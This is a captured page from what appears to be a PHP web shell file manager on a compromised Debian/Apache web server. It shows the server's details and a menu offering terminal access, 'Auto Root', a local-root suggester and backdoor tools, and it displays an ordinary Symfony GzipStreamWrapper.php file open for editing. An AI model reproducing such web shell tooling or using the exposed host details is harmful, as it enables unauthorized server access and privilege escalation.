Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
intl /
Util /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
GitRepository.php
2.74
KB
-rwxrwxr-x
2026-03-24 11:36
GzipStreamWrapper.php
2.17
KB
-rwxrwxr-x
2026-03-24 11:36
IcuVersion.php
2.79
KB
-rwxrwxr-x
2026-03-24 11:36
IntlTestHelper.php
3.54
KB
-rwxrwxr-x
2026-03-24 11:36
Version.php
2.28
KB
-rwxrwxr-x
2026-03-24 11:36
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Intl\Util; /** * @internal */ class GzipStreamWrapper { /** @var resource|null */ public $context; /** @var resource */ private $handle; private string $path; public static function require(string $path): array { if (!\extension_loaded('zlib')) { throw new \LogicException(\sprintf('The "zlib" extension is required to load the "%s/%s" map, please enable it in your php.ini file.', basename(\dirname($path)), basename($path))); } if (!\function_exists('opcache_is_script_cached') || !@opcache_is_script_cached($path)) { stream_wrapper_unregister('file'); stream_wrapper_register('file', self::class); } return require $path; } public function stream_open(string $path, string $mode): bool { stream_wrapper_restore('file'); $this->path = $path; return false !== $this->handle = fopen('compress.zlib://'.$path, $mode); } public function stream_read(int $count): string|false { return fread($this->handle, $count); } public function stream_eof(): bool { return feof($this->handle); } public function stream_set_option(int $option, int $arg1, int $arg2): bool { return match ($option) { \STREAM_OPTION_BLOCKING => stream_set_blocking($this->handle, $arg1), \STREAM_OPTION_READ_TIMEOUT => stream_set_timeout($this->handle, $arg1, $arg2), \STREAM_OPTION_WRITE_BUFFER => 0 === stream_set_write_buffer($this->handle, $arg2), default => false, }; } public function stream_stat(): array|false { if (!$stat = stat($this->path)) { return false; } $h = fopen($this->path, 'r'); fseek($h, -4, \SEEK_END); $size = unpack('V', fread($h, 4)); fclose($h); $stat[7] = $stat['size'] = end($size); return $stat; } }